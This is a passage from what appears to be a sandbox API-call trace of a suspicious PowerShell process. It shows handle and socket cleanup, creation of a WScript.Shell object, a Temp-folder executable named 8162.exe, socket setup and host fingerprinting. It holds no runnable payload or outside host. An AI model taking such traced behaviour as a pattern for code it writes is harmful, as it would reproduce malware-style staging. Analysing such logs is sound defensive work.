returned 0x0 [0102.710] DeregisterEventSource (hEventLog=0x4eb0004) returned 1 [0102.716] GetLastError () returned 0x0 [0102.728] setsockopt (s=0x54c, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0102.728] GetLastError () returned 0x0 [0102.728] closesocket (s=0x54c) returned 0 [0102.729] GetLastError () returned 0x0 [0102.730] setsockopt (s=0x548, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0102.730] GetLastError () returned 0x0 [0102.731] closesocket (s=0x548) returned 0 [0102.731] GetLastError () returned 0x0 [0102.744] CloseHandle (hObject=0x5fc) returned 1 [0102.744] GetLastError () returned 0x0 [0102.745] CloseHandle (hObject=0x600) returned 1 [0102.745] GetLastError () returned 0x0 [0102.745] CloseHandle (hObject=0x614) returned 1 [0102.746] GetLastError () returned 0x0 [0102.746] UnmapViewOfFile (lpBaseAddress=0x4a80000) returned 1 [0102.747] GetLastError () returned 0x0 [0102.747] CloseHandle (hObject=0x490) returned 1 [0102.748] GetLastError () returned 0x0 [0102.748] CloseHandle (hObject=0x610) returned 1 [0102.748] GetLastError () returned 0x0 [0102.748] CloseHandle (hObject=0x60c) returned 1 [0102.748] GetLastError () returned 0x0 [0102.749] CloseHandle (hObject=0x488) returned 1 [0102.749] GetLastError () returned 0x0 [0102.750] CloseHandle (hObject=0x484) returned 1 [0102.750] GetLastError () returned 0x0 [0102.750] CloseHandle (hObject=0x440) returned 1 [0102.751] GetLastError () returned 0x0 [0102.752] CloseHandle (hObject=0x43c) returned 1 [0102.752] GetLastError () returned 0x0 [0102.752] CloseHandle (hObject=0x438) returned 1 [0102.752] GetLastError () returned 0x0 [0102.753] CloseHandle (hObject=0x434) returned 1 [0102.753] GetLastError () returned 0x0 [0102.756] CloseHandle (hObject=0x430) returned 1 [0102.756] GetLastError () returned 0x0 [0102.756] CloseHandle (hObject=0x61c) returned 1 [0102.756] GetLastError () returned 0x0 [0102.757] CloseHandle (hObject=0x420) returned 1 [0102.757] GetLastError () returned 0x0 [0102.758] CloseHandle (hObject=0x41c) returned 1 [0102.758] GetLastError () returned 0x0 [0102.759] CloseHandle (hObject=0x418) returned 1 [0102.759] GetLastError () returned 0x0 [0102.763] CloseHandle (hObject=0x414) returned 1 [0102.763] GetLastError () returned 0x0 [0102.764] CloseHandle (hObject=0x410) returned 1 [0102.764] GetLastError () returned 0x0 [0102.764] CloseHandle (hObject=0x384) returned 1 [0102.765] GetLastError () returned 0x0 [0102.765] CloseHandle (hObject=0x388) returned 1 [0102.765] GetLastError () returned 0x0 [0102.766] CloseHandle (hObject=0x380) returned 1 [0102.766] GetLastError () returned 0x0 [0102.767] CloseHandle (hObject=0x1b) returned 1 [0102.768] GetLastError () returned 0x0 [0102.768] CloseHandle (hObject=0x17) returned 1 [0102.769] GetLastError () returned 0x0 [0102.769] CloseHandle (hObject=0x13) returned 1 [0102.770] GetLastError () returned 0x0 [0102.770] setsockopt (s=0x560, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0102.770] GetLastError () returned 0x273a [0102.770] closesocket (s=0x560) returned 0 [0102.771] GetLastError () returned 0x0 [0102.771] CloseHandle (hObject=0x564) returned 1 [0102.771] GetLastError () returned 0x0 [0102.772] setsockopt (s=0x550, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0102.772] GetLastError () returned 0x273a [0102.772] closesocket (s=0x550) returned 0 [0102.773] GetLastError () returned 0x0 [0102.773] CloseHandle (hObject=0x55c) returned 1 [0102.773] GetLastError () returned 0x0 [0102.773] CloseHandle (hObject=0xf) returned 1 [0102.775] GetLastError () returned 0x0 [0102.776] RegCloseKey (hKey=0x630) returned 0x0 [0102.776] CloseHandle (hObject=0x628) returned 1 [0102.776] GetLastError () returned 0x0 [0102.778] CloseHandle (hObject=0x514) returned 1 [0102.779] GetLastError () returned 0x0 [0102.779] CloseHandle (hObject=0x540) returned 1 [0102.779] GetLastError () returned 0x0 [0102.780] CloseHandle (hObject=0x624) returned 1 [0102.780] GetLastError () returned 0x0 [0102.780] CloseHandle (hObject=0x4ec) returned 1 [0102.781] GetLastError () returned 0x0 [0102.781] CloseHandle (hObject=0x4e8) returned 1 [0102.781] GetLastError () returned 0x0 [0102.782] CloseHandle (hObject=0x4d4) returned 1 [0102.782] GetLastError () returned 0x0 [0102.783] CloseHandle (hObject=0x4d0) returned 1 [0102.783] GetLastError () returned 0x0 [0102.783] RegCloseKey (hKey=0x4cc) returned 0x0 [0102.783] GetLastError () returned 0x0 [0102.784] CloseHandle (hObject=0x4c8) returned 1 [0102.784] GetLastError () returned 0x0 [0102.784] RegCloseKey (hKey=0x4c4) returned 0x0 [0102.784] GetLastError () returned 0x0 [0102.785] CloseHandle (hObject=0x4c0) returned 1 [0102.785] GetLastError () returned 0x0 [0102.785] RegCloseKey (hKey=0x4bc) returned 0x0 [0102.785] GetLastError () returned 0x0 [0102.786] RegCloseKey (hKey=0x4b8) returned 0x0 [0102.786] GetLastError () returned 0x0 [0102.786] CloseHandle (hObject=0x4a0) returned 1 [0102.786] GetLastError () returned 0x0 [0102.787] CloseHandle (hObject=0x3f0) returned 1 [0102.787] GetLastError () returned 0x0 [0102.787] CloseHandle (hObject=0x3ec) returned 1 [0102.787] GetLastError () returned 0x0 [0102.788] CloseHandle (hObject=0x3e8) returned 1 [0102.788] GetLastError () returned 0x0 [0102.788] CloseHandle (hObject=0x3e4) returned 1 [0102.788] GetLastError () returned 0x0 [0102.789] CloseHandle (hObject=0x3e0) returned 1 [0102.789] GetLastError () returned 0x0 [0102.789] CloseHandle (hObject=0x3dc) returned 1 [0102.789] GetLastError () returned 0x0 [0102.789] CloseHandle (hObject=0x3d8) returned 1 [0102.790] GetLastError () returned 0x0 [0102.790] CloseHandle (hObject=0x3d4) returned 1 [0102.790] GetLastError () returned 0x0 [0102.790] CloseHandle (hObject=0x3d0) returned 1 [0102.791] GetLastError () returned 0x0 [0102.791] CloseHandle (hObject=0x3cc) returned 1 [0102.791] GetLastError () returned 0x0 [0102.791] CloseHandle (hObject=0x3c8) returned 1 [0102.792] GetLastError () returned 0x0 [0102.792] CloseHandle (hObject=0x3c4) returned 1 [0102.792] GetLastError () returned 0x0 [0102.792] CloseHandle (hObject=0x3c0) returned 1 [0102.792] GetLastError () returned 0x0 [0102.793] setsockopt (s=0x498, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0102.793] GetLastError () returned 0x273a [0102.793] closesocket (s=0x498) returned 0 [0102.794] GetLastError () returned 0x0 [0102.794] CloseHandle (hObject=0x49c) returned 1 [0102.794] GetLastError () returned 0x0 [0102.794] setsockopt (s=0x48c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0102.795] GetLastError () returned 0x273a [0102.795] closesocket (s=0x48c) returned 0 [0102.795] GetLastError () returned 0x0 [0102.795] CloseHandle (hObject=0x494) returned 1 [0102.795] GetLastError () returned 0x0 [0102.796] CloseHandle (hObject=0x620) returned 1 [0102.796] GetLastError () returned 0x0 [0102.796] CloseHandle (hObject=0x618) returned 1 [0102.797] GetLastError () returned 0x0 [0102.797] CloseHandle (hObject=0x5f8) returned 1 [0102.798] GetLastError () returned 0x0 [0102.798] CloseHandle (hObject=0x608) returned 1 [0102.798] GetLastError () returned 0x0 [0102.799] CloseHandle (hObject=0x604) returned 1 [0102.799] GetLastError () returned 0x0 [0102.799] CloseHandle (hObject=0x33c) returned 1 [0102.799] GetLastError () returned 0x0 [0102.800] RegCloseKey (hKey=0x80000004) returned 0x0 [0102.800] CloseHandle (hObject=0x5f4) returned 1 [0102.800] GetLastError () returned 0x0 [0102.800] CloseHandle (hObject=0x2f8) returned 1 [0102.802] GetLastError () returned 0x0 [0102.803] CloseHandle (hObject=0x32c) returned 1 [0102.803] GetLastError () returned 0x0 [0102.803] UnmapViewOfFile (lpBaseAddress=0x2150000) returned 1 [0102.807] CoGetContextToken (in: pToken=0x260e01c | out: pToken=0x260e01c) returned 0x0 [0102.808] CoGetContextToken (in: pToken=0x260dfac | out: pToken=0x260dfac) returned 0x0 [0102.808] IUnknown:Release (This=0x34a07c) returned 0x0 [0102.809] IUnknown:Release (This=0x297f30) returned 0x0 Thread: id = 30 os_tid = 0xae4 [0080.926] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0080.968] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.987] VirtualQuery (in: lpAddress=0x5fce660, lpBuffer=0x5fcf660, dwLength=0x1c | out: lpBuffer=0x5fcf660*(BaseAddress=0x5fce000, AllocationBase=0x5640000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0081.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.003] GetLastError () returned 0xcb [0081.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.013] GetLastError () returned 0xcb [0081.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.017] GetLastError () returned 0xcb [0081.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.033] GetLastError () returned 0xcb [0081.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.038] GetLastError () returned 0xcb [0081.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.049] GetLastError () returned 0xcb [0081.082] VirtualQuery (in: lpAddress=0x5fce77c, lpBuffer=0x5fcf77c, dwLength=0x1c | out: lpBuffer=0x5fcf77c*(BaseAddress=0x5fce000, AllocationBase=0x5640000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0081.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.083] GetLastError () returned 0xcb [0081.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.086] GetLastError () returned 0xcb [0081.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.086] GetLastError () returned 0xcb [0081.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.114] GetLastError () returned 0xcb [0081.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.147] GetLastError () returned 0xcb [0081.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.227] GetLastError () returned 0xcb [0081.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.230] GetLastError () returned 0xcb [0081.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.232] GetLastError () returned 0xcb [0081.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.235] GetLastError () returned 0xcb [0081.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.237] GetLastError () returned 0xcb [0081.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.239] GetLastError () returned 0xcb [0081.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.241] GetLastError () returned 0xcb [0081.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.282] GetLastError () returned 0xcb [0081.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.320] GetLastError () returned 0xcb [0081.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.324] GetLastError () returned 0xcb [0081.546] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x5fcf278 | out: lpclsid=0x5fcf278*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0081.580] CoGetClassObject (in: rclsid=0x326f9c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x66a1a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fcf008 | out: ppv=0x5fcf008*=0x2e9fd4) returned 0x0 [0081.752] WshShell:IUnknown:QueryInterface (in: This=0x2e9fd4, riid=0x66b07ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fcee38 | out: ppvObject=0x5fcee38*=0x0) returned 0x80004002 [0081.752] WshShell:IClassFactory:CreateInstance (in: This=0x2e9fd4, pUnkOuter=0x0, riid=0x66a97714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fcee70 | out: ppvObject=0x5fcee70*=0x34a07c) returned 0x0 [0081.753] IUnknown:QueryInterface (in: This=0x34a07c, riid=0x66a97714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fcec14 | out: ppvObject=0x5fcec14*=0x34a07c) returned 0x0 [0081.754] IUnknown:QueryInterface (in: This=0x34a07c, riid=0x66ab4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fcebd0 | out: ppvObject=0x5fcebd0*=0x0) returned 0x80004002 [0081.754] IUnknown:QueryInterface (in: This=0x34a07c, riid=0x669e0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fceac4 | out: ppvObject=0x5fceac4*=0x2ea724) returned 0x0 [0081.765] IProvideClassInfo:GetClassInfo (in: This=0x2ea724, ppTI=0x5fceabc | out: ppTI=0x5fceabc*=0x3699bc) returned 0x0 [0081.783] ITypeInfo:RemoteGetTypeAttr (in: This=0x3699bc, ppTypeAttr=0x5fcead0, pDummy=0xbfbfd688 | out: ppTypeAttr=0x5fcead0, pDummy=0xbfbfd688) returned 0x0 [0081.785] ITypeInfo:LocalReleaseTypeAttr (This=0x3699bc) returned 0x9e0001 [0081.794] IUnknown:Release (This=0x2ea724) returned 0x2 [0081.794] IUnknown:Release (This=0x3699bc) returned 0x0 [0081.795] IUnknown:AddRef (This=0x34a07c) returned 0x3 [0081.795] CoGetContextToken (in: pToken=0x5fcea5c | out: pToken=0x5fcea5c) returned 0x0 [0081.796] CoGetObjectContext (in: riid=0x66a97714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350e94 | out: ppv=0x350e94*=0x297f30) returned 0x0 [0081.796] IUnknown:QueryInterface (in: This=0x34a07c, riid=0x669923cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fcea44 | out: ppvObject=0x5fcea44*=0x349fdc) returned 0x0 [0081.796] IMarshal:GetUnmarshalClass (in: This=0x349fdc, riid=0x66a97714, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fcea4c | out: pCid=0x5fcea4c) returned 0x0 [0081.796] IUnknown:Release (This=0x349fdc) returned 0x3 [0081.797] CoGetContextToken (in: pToken=0x5fcea54 | out: pToken=0x5fcea54) returned 0x0 [0081.797] IUnknown:AddRef (This=0x34a07c) returned 0x4 [0081.797] IUnknown:QueryInterface (in: This=0x34a07c, riid=0x669e767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fceac8 | out: ppvObject=0x5fceac8*=0x34a064) returned 0x0 [0081.798] IUnknown:Release (This=0x34a07c) returned 0x4 [0081.798] IRpcOptions:Query (in: This=0x34a064, pPrx=0x34a07c, dwProperty=2, pdwValue=0x5fceaec | out: pdwValue=0x5fceaec) returned 0x0 [0081.801] IUnknown:Release (This=0x34a064) returned 0x3 [0081.801] IUnknown:Release (This=0x34a07c) returned 0x2 [0081.801] WshShell:IUnknown:Release (This=0x2e9fd4) returned 0x0 [0081.802] IUnknown:Release (This=0x34a07c) returned 0x1 [0082.610] GetCurrentProcess () returned 0xffffffff [0082.610] GetLastError () returned 0x3f0 [0082.610] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcec48 | out: TokenHandle=0x5fcec48*=0x380) returned 1 [0082.610] GetLastError () returned 0x3f0 [0082.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5fce7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0082.623] GetLastError () returned 0x0 [0082.626] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", fInfoLevelId=0x0, lpFileInformation=0x5fcec88 | out: lpFileInformation=0x5fcec88) returned 1 [0082.626] GetLastError () returned 0x0 [0082.645] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x388 [0082.645] GetLastError () returned 0x0 [0082.645] GetFileType (hFile=0x388) returned 0x1 [0082.645] SetErrorMode (uMode=0x1) returned 0x1 [0082.645] GetFileType (hFile=0x388) returned 0x1 [0082.648] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x5fcec58 | out: lpFileSizeHigh=0x5fcec58*=0x0) returned 0x65b3 [0082.648] GetLastError () returned 0x0 [0082.648] ReadFile (in: hFile=0x388, lpBuffer=0x2c50468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fcec10, lpOverlapped=0x0 | out: lpBuffer=0x2c50468*, lpNumberOfBytesRead=0x5fcec10*=0x1000, lpOverlapped=0x0) returned 1 [0082.649] GetLastError () returned 0x0 [0082.658] CloseHandle (hObject=0x388) returned 1 [0082.658] GetLastError () returned 0x0 [0082.661] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36e8a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0082.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5fceb34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0082.661] GetLastError () returned 0x0 [0082.663] GetCurrentProcess () returned 0xffffffff [0082.664] GetLastError () returned 0x3f0 [0082.664] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceed8 | out: TokenHandle=0x5fceed8*=0x388) returned 1 [0082.664] GetLastError () returned 0x3f0 [0082.666] GetCurrentProcess () returned 0xffffffff [0082.666] GetLastError () returned 0x3f0 [0082.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceed8 | out: TokenHandle=0x5fceed8*=0x384) returned 1 [0082.666] GetLastError () returned 0x3f0 [0082.672] GetCurrentProcess () returned 0xffffffff [0082.672] GetLastError () returned 0x3f0 [0082.672] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcec48 | out: TokenHandle=0x5fcec48*=0x410) returned 1 [0082.673] GetLastError () returned 0x3f0 [0082.673] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", fInfoLevelId=0x0, lpFileInformation=0x5fcec88 | out: lpFileInformation=0x5fcec88) returned 0 [0082.673] GetLastError () returned 0x2 [0082.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fce7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0082.673] GetLastError () returned 0x2 [0082.674] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", fInfoLevelId=0x0, lpFileInformation=0x5fcec84 | out: lpFileInformation=0x5fcec84) returned 0 [0082.674] GetLastError () returned 0x2 [0082.674] GetCurrentProcess () returned 0xffffffff [0082.674] GetLastError () returned 0x3f0 [0082.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceed8 | out: TokenHandle=0x5fceed8*=0x414) returned 1 [0082.675] GetLastError () returned 0x3f0 [0082.675] GetCurrentProcess () returned 0xffffffff [0082.675] GetLastError () returned 0x3f0 [0082.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceed8 | out: TokenHandle=0x5fceed8*=0x418) returned 1 [0082.676] GetLastError () returned 0x3f0 [0082.722] GetCurrentProcess () returned 0xffffffff [0082.722] GetLastError () returned 0x3f0 [0082.722] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcecb4 | out: TokenHandle=0x5fcecb4*=0x41c) returned 1 [0082.722] GetLastError () returned 0x3f0 [0082.741] GetCurrentProcess () returned 0xffffffff [0082.741] GetLastError () returned 0x3f0 [0082.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcecc4 | out: TokenHandle=0x5fcecc4*=0x420) returned 1 [0082.741] GetLastError () returned 0x3f0 [0082.743] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fceba8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0082.744] GetLastError () returned 0x3f0 [0082.744] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fcebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0082.744] GetLastError () returned 0x3f0 [0082.744] SetErrorMode (uMode=0x1) returned 0x1 [0082.746] GetLastError () returned 0x0 [0082.746] GetFileType (hFile=0x424) returned 0x1 [0082.746] SetErrorMode (uMode=0x1) returned 0x1 [0082.746] GetFileType (hFile=0x424) returned 0x1 [0082.750] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x428 [0082.750] GetLastError () returned 0x0 [0082.750] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x42c [0082.750] GetLastError () returned 0x0 [0082.777] GetCurrentProcess () returned 0xffffffff [0082.778] GetLastError () returned 0x3f0 [0082.778] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcecd8 | out: TokenHandle=0x5fcecd8*=0x430) returned 1 [0082.778] GetLastError () returned 0x3f0 [0082.784] GetCurrentProcess () returned 0xffffffff [0082.784] GetLastError () returned 0x3f0 [0082.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcece8 | out: TokenHandle=0x5fcece8*=0x434) returned 1 [0082.784] GetLastError () returned 0x3f0 [0082.800] GetCurrentProcess () returned 0xffffffff [0082.800] GetLastError () returned 0x3f0 [0082.800] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcecac | out: TokenHandle=0x5fcecac*=0x438) returned 1 [0082.800] GetLastError () returned 0x3f0 [0082.807] GetCurrentProcess () returned 0xffffffff [0082.807] GetLastError () returned 0x3f0 [0082.807] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcecbc | out: TokenHandle=0x5fcecbc*=0x43c) returned 1 [0082.807] GetLastError () returned 0x3f0 [0082.813] GetCurrentProcess () returned 0xffffffff [0082.813] GetLastError () returned 0x3f0 [0082.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcefb0 | out: TokenHandle=0x5fcefb0*=0x440) returned 1 [0082.813] GetLastError () returned 0x3f0 [0082.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fce010 | out: phkResult=0x5fce010*=0x444) returned 0x0 [0082.863] RegQueryValueExW (in: hKey=0x444, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5fce058, lpData=0x0, lpcbData=0x5fce054*=0x0 | out: lpType=0x5fce058*=0x1, lpData=0x0, lpcbData=0x5fce054*=0xe) returned 0x0 [0082.863] RegQueryValueExW (in: hKey=0x444, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5fce058, lpData=0x36e8a8, lpcbData=0x5fce054*=0xe | out: lpType=0x5fce058*=0x1, lpData="Client", lpcbData=0x5fce054*=0xe) returned 0x0 [0082.864] RegCloseKey (hKey=0x444) returned 0x0 [0083.027] RasEnumConnectionsW (in: param_1=0x3702f0, param_2=0x5fcf028, param_3=0x5fcf02c | out: param_1=0x3702f0, param_2=0x5fcf028, param_3=0x5fcf02c) returned 0x0 [0083.105] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x3702f0 | out: lpWSAData=0x3702f0) returned 0 [0083.124] GetLastError () returned 0x0 [0083.134] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x484 [0083.264] GetLastError () returned 0x0 [0083.264] setsockopt (s=0x484, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0083.264] GetLastError () returned 0x273a [0083.264] closesocket (s=0x484) returned 0 [0083.264] GetLastError () returned 0x0 [0083.264] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x484 [0083.310] GetLastError () returned 0x0 [0083.310] setsockopt (s=0x484, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0083.310] GetLastError () returned 0x273a [0083.310] closesocket (s=0x484) returned 0 [0083.310] GetLastError () returned 0x0 [0083.312] GetCurrentProcess () returned 0xffffffff [0083.312] GetLastError () returned 0x3f0 [0083.313] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceb94 | out: TokenHandle=0x5fceb94*=0x484) returned 1 [0083.313] GetLastError () returned 0x3f0 [0083.313] GetCurrentProcess () returned 0xffffffff [0083.313] GetLastError () returned 0x3f0 [0083.313] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fceba4 | out: TokenHandle=0x5fceba4*=0x488) returned 1 [0083.314] GetLastError () returned 0x3f0 [0083.316] GetComputerNameW (in: lpBuffer=0x3702f0, nSize=0x2c71484 | out: lpBuffer="1R6PFH", nSize=0x2c71484) returned 1 [0083.316] RegOpenKeyExW 